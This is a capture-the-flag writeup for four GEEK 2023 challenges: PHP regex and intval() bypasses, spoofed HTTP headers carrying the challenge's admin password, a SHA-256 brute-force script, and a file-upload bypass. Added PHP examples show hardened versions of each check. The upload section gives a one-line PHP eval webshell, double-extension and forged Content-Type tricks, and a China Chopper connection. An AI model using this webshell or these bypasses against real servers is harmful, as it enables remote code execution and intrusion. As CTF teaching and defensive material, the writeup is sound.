GEEK Challenge (极客大挑战): partial writeup

1. easy_php

isset($_GET['syc'])&&preg_match('/^Welcome to GEEK 2023!$/i', $_GET['syc']) && $_GET['syc'] !== 'Welcome to GEEK 2023!'

isset($_GET['syc']): checks whether $_GET['syc'] is set, i.e. whether the client passed a parameter named syc.

preg_match('/^Welcome to GEEK 2023!$/i', $_GET['syc']): checks with a regular expression that the value of $_GET['syc'] matches Welcome to GEEK 2023! from start to end; the i flag makes the match case-insensitive.

$_GET['syc'] !== 'Welcome to GEEK 2023!': checks that the value of $_GET['syc'] is not byte-for-byte identical to Welcome to GEEK 2023!.

Bypass

syc=Welcome to geek 2023!
intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024

intval($_GET['lover']) < 2023: converts $_GET['lover'] to an integer and checks that it is less than 2023.

intval($_GET['lover'] + 1) > 2024: first evaluates $_GET['lover'] + 1 (PHP coerces the string to a number for the addition), then converts that result to an integer and checks that it is greater than 2024.

This is the classic pattern intval($num)<2020 && intval($num+1)>2021: no ordinary integer can satisfy both halves, so the value has to be sent in scientific notation, for example ?num=2e4, which gives intval($num)=2 and intval($num+1)=20001.

isset($_POST['qw']) && $_POST['yxx']

Bypass

Write the POST body directly in HackBar:

qw=1&yxx=2
$array1 = (string)$_POST['qw'];
$array2 = (string)$_POST['yxx'];
if (sha1($array1) === sha1($array2))

sha1() computes the SHA-1 hash of each of the two values, and the hash of $array1 is compared with the hash of $array2. If they are identical the passwords match; otherwise they do not.

Bypass

qw=1&yxx=1
isset($_POST['SYC_GEEK.2023'])&&($_POST['SYC_GEEK.2023']="Happy to see you!")

Bypass

SYC[GEEK.2023=1
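To see how each of the four gates behaves on concrete input, here is an added PHP script; it is not part of the original writeup or the challenge source. It reproduces each check as quoted above and puts a stricter form beside it. The function names (gate_syc, strict_lover, mangled_keys), the sample inputs and the use of parse_str() to stand in for $_POST are this example's own choices. It also covers two points the writeup leaves implicit: a trailing newline passes the regex gate because $ matches just before a final "\n", and the value intval() returns for 2e4 depends on the PHP version.

```php
<?php
// Added example (not the challenge's own code): the four easy_php gates as
// quoted in the writeup, each beside a stricter form, run on constructed inputs.
// All function and variable names below are this example's own choices.

// Gate 1: case-insensitive regex versus strict inequality.
function gate_syc(string $syc): bool {
    return preg_match('/^Welcome to GEEK 2023!$/i', $syc) === 1
        && $syc !== 'Welcome to GEEK 2023!';
}
// Stricter form: compare the exact bytes. No /i, and no '$' (which also matches
// just before a trailing "\n"), so only the one literal string is accepted.
function strict_syc(string $syc): bool {
    return $syc === 'Welcome to GEEK 2023!';
}

// Gate 2: intval() on the raw string versus intval() after arithmetic.
function gate_lover(string $lover): bool {
    return intval($lover) < 2023 && intval($lover + 1) > 2024;
}
// Stricter form: accept only a plain decimal integer before doing any
// arithmetic, so inputs such as "2e4" never reach intval() at all.
function strict_lover(string $lover): ?int {
    $n = filter_var($lover, FILTER_VALIDATE_INT);
    return $n === false ? null : $n;
}

// Gate 4: PHP's parameter-name mangling. parse_str() applies the same rewriting
// as $_GET/$_POST: '.' and ' ' in a name become '_', and an unclosed '[' is also
// rewritten to '_', which is why a key containing a dot can only arrive via the
// '[' spelling. (The '=' inside the gate is an assignment, so any value passes.)
function mangled_keys(string $query): array {
    parse_str($query, $out);
    return array_keys($out);
}

$cases = [
    'Welcome to GEEK 2023!',   // exact literal: fails the contradictory gate
    'Welcome to geek 2023!',   // case changed: passes /i, differs under !==
    "Welcome to GEEK 2023!\n", // trailing newline: '$' still matches
];
foreach ($cases as $c) {
    printf("gate_syc=%d strict_syc=%d  %s\n", gate_syc($c), strict_syc($c), json_encode($c));
}

// intval("2e4") is 2 on PHP < 7.1 and 20000 on PHP >= 7.1 (numeric strings in
// scientific notation are honoured since 7.1); "2e4" + 1 is 20001.0 either way.
foreach (['2022', '2e4'] as $v) {
    printf("lover=%s intval=%d intval(+1)=%d gate=%d strict=%s\n",
        $v, intval($v), intval($v + 1), gate_lover($v), var_export(strict_lover($v), true));
}

print_r(mangled_keys('SYC_GEEK.2023=1'));  // key arrives as SYC_GEEK_2023
print_r(mangled_keys('SYC[GEEK.2023=1'));  // key arrives as SYC_GEEK.2023
```

The version note matters for reproducing the writeup: on PHP 7.1 and later intval('2e4') is 20000, so the gate_lover line above fails there and the author's reasoning only holds on older interpreters; the FILTER_VALIDATE_INT form behaves the same on every version.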

2. Ezhttp

First open the site's robots.txt (the file that tells crawlers what they may index); it contains the username and password.

POST / HTTP/1.1
Host: 1.117.175.65:23333
Content-Length: 253
Cache-Control: no-cache
User-Agent: Syclover
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryp0mRGvNDO8CTgw1S
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Referer: sycsec.com
X-Forwarded-For: 127.0.0.1
via: Syc.vip
O2TAKUXX: GiveMeFlag

------WebKitFormBoundaryp0mRGvNDO8CTgw1S
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryp0mRGvNDO8CTgw1S
Content-Disposition: form-data; name="password"

@dm1N123456r00t#
------WebKitFormBoundaryp0mRGvNDO8CTgw1S--

via: Syc.vip   the request claims to have passed through the proxy server Syc.vip

X-Forwarded-For: 127.0.0.1   the request claims to originate from 127.0.0.1

Referer: sycsec.com   the referring page is sycsec.com

O2TAKUXX: GiveMeFlag   a custom HTTP header with the value GiveMeFlag

User-Agent: Syclover   the browser identifies itself as Syclover
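Every one of those headers is chosen by the client, which is why a server can satisfy itself with them in a CTF but cannot use them to learn where a request came from. The added PHP example below (not code from the challenge) contrasts a gate that trusts X-Forwarded-For with one that only honours it when the direct peer is a proxy the operator controls. The names client_ip, weak_is_local, strict_is_local and TRUSTED_PROXIES, and the sample $_SERVER arrays and addresses, are this example's own constructions.

```php
<?php
// Added example (not the challenge's own code): why a header-based "request
// must come from localhost" gate is not one. Every header in the request shown
// above is set by the client; only REMOTE_ADDR comes from the TCP connection.
// Names and addresses below are this example's own constructions.

const TRUSTED_PROXIES = ['10.0.0.5'];   // constructed: the reverse proxy we operate

// Weak gate: believes X-Forwarded-For exactly as the client sent it.
function weak_is_local(array $server): bool {
    return ($server['HTTP_X_FORWARDED_FOR'] ?? '') === '127.0.0.1';
}

// Safer: honour X-Forwarded-For only when the direct peer is a proxy we run,
// and then take the address that proxy appended (the right-most entry),
// because a client can prepend anything it likes to the header.
function client_ip(array $server): string {
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (in_array($peer, TRUSTED_PROXIES, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        return end($hops);
    }
    return $peer;
}

function strict_is_local(array $server): bool {
    $ip = client_ip($server);
    return $ip === '127.0.0.1' || $ip === '::1';
}

// Constructed $_SERVER-like arrays (addresses from the documentation ranges).
$direct_spoof = [
    'REMOTE_ADDR'          => '203.0.113.7',   // the real peer
    'HTTP_X_FORWARDED_FOR' => '127.0.0.1',     // client-supplied, as in the writeup
    'HTTP_REFERER'         => 'sycsec.com',    // also client-supplied
    'HTTP_USER_AGENT'      => 'Syclover',      // also client-supplied
];
$via_proxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 198.51.100.9', // proxy appended the real client last
];

foreach (['direct_spoof' => $direct_spoof, 'via_proxy' => $via_proxy] as $label => $srv) {
    printf("%-12s weak=%d strict=%d client_ip=%s\n",
        $label, weak_is_local($srv), strict_is_local($srv), client_ip($srv));
}
```

The same reasoning applies to Referer, Via and User-Agent: they are useful for logging and for telling clients apart, not for authorisation. If a proxy is in front of the application, it should overwrite (not append to) the forwarding header it sets, or the application should only trust the last hop as shown.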

3. proof_of_work

Connect with nc to 59.110.20.54 5526:

Cmd line: 59.110.20.54 5526
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
sha256(XXXX+tptFjH7yPLuQ8V3l) == 037984e0b5358c11e77e518d4a998163e9f8021969b7c9bb8ff1d66b37d0e9b9
Give me XXXX:

sha256(XXXX+tptFjH7yPLuQ8V3l) tells us the hash function is SHA-256, XXXX is the part we have to supply in front of the given string, and the value after the equals sign is the target digest. The obvious approach is to brute-force the four characters until the digest matches (the writeup calls this a hash collision; strictly it is a preimage search over a small space).

The Python code for the brute force:

import hashlib
from itertools import product


def find_collision(known_plaintext, known_hash, charset, length=4):
    """Brute-force the `length` unknown leading characters.

    Every string of `length` characters drawn from `charset` is prepended to
    the known suffix and its SHA-256 hex digest compared with the target.
    Returns the full plaintext on success, None if nothing in the space matches.
    Nothing is printed inside the loop: with 62**4 candidates a print per
    attempt would dominate the running time.
    """
    target = known_hash.lower()
    for candidate in product(charset, repeat=length):
        plaintext = "".join(candidate) + known_plaintext
        if hashlib.sha256(plaintext.encode()).hexdigest() == target:
            return plaintext
    return None


# Values from one run of the challenge (suffix and target change per connection).
known_plaintext = "E2g37ZVS00iwlIrO"
known_hash = "cd0f34c6a816a54075851cf66c864dafd0fbb0d8119cc2084b54a006d561c308"
charset = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

collision = find_collision(known_plaintext, known_hash, charset)
if collision:
    print(f"Found a match: {collision}")
else:
    print("No match found")

4. n00b_Upload

Extension check

$ext_arr = array('jpg','png','gif','php');
// deny-list of extensions
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf","htaccess","ini");
// text after the last dot of the uploaded file's name
$file_ext = substr($_FILES['file']['name'],strrpos($_FILES['file']['name'],".")+1);
// fall back to the uploaded name when the filename field is empty
$file = empty($_POST['filename']) ? $_FILES['file']['name'] : $_POST['filename'];
// extension of the filename field, to be checked against the deny-list
$name = basename($_POST['filename']);
$filename_ext= pathinfo($name,PATHINFO_EXTENSION);

Content-Type header check

// check the Content-Type the client sent for the file part
if (($_FILES['file']['type'] == 'image/jpeg') || ($_FILES['file']['type'] == 'image/png') || ($_FILES['file']['type'] == 'image/gif')){
    echo "头部过了<br>";

File content check

// scan the whole file content
if (!empty($_FILES['file'])) {
    $filename = $_FILES['file']['name'];
    $filetype = $_FILES['file']['type'];
    $filesize = $_FILES['file']['size'];
    $tmp_name = $_FILES['file']['tmp_name'];
    # generate a new filename based on a random number and the original file extension
    $new_filename = rand(100000, 999999) . '_' . uniqid() . '.' . $file_ext;

    # move uploaded file to the target directory
    $target_dir = 'uploadtest';
    $target_path = $target_dir . '/' . $new_filename;
    if (move_uploaded_file($tmp_name, $target_path)) {
        # get file contents and check if it contains PHP code
        $file_content = file_get_contents($target_path);
        if (preg_match('/<\?(php)|<script\b[^>]*>(.*?)<\/script>/si', $file_content)) {
            die('你上传的内容一看就是木马<br>https://ys.mihoyo.com/');

Putting this together: a name such as 1.php.jpg gets past the extension check; with Burp, change the Content-Type header to image/jpeg; the one-line webshell is <?=eval($_POST["cmd"]); (the content regex only matches the literal <?php), and then connect with China Chopper (for some reason AntSword did not work).

All of the PHP above was obtained from upload_file.php after connecting with China Chopper.
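For contrast, here is an added PHP upload validator, not the challenge's upload_file.php, written to close the three gaps the excerpts above show: the extension is taken from the file's own name and checked against an allow-list rather than a deny-list, the content is sniffed on the server instead of trusting the client's Content-Type, and the stored name is chosen by the server with an extension derived from the sniffed type. The function name validate_upload, the $allowed map and the example directory are this example's own choices.

```php
<?php
// Added example (not the challenge's upload_file.php): a stricter upload
// validator. Names ($allowed, validate_upload, the target directory) are
// this example's own choices.

function validate_upload(array $file, string $target_dir): string {
    // Only these MIME types, each with exactly one permitted extension.
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Extension from the uploaded name, lower-cased. "1.php.jpg" yields "jpg"
    // here as well, which is why the extension alone must never decide anything.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        throw new RuntimeException('extension not allowed');
    }

    // Sniff the stored bytes; $_FILES['file']['type'] is whatever the client sent.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || $allowed[$mime] !== $ext) {
        throw new RuntimeException('content does not match a permitted image type');
    }
    // Independent second check: it must decode as an image at all.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }

    // Server-chosen name; nothing the client sent reaches the path.
    $new_name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $target   = rtrim($target_dir, '/') . '/' . $new_name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    return $target;
}

// Usage inside the request handler (directory is an example path):
// $path = validate_upload($_FILES['file'], '/var/uploads');
```

Two operational points complete the picture: keep the upload directory outside the web root, or configure the web server so nothing in it is ever handed to the PHP interpreter, and treat the content regex in the original as a last line of defence at most, since a scan for one spelling of an opening tag is easy to miss with and says nothing about other file types.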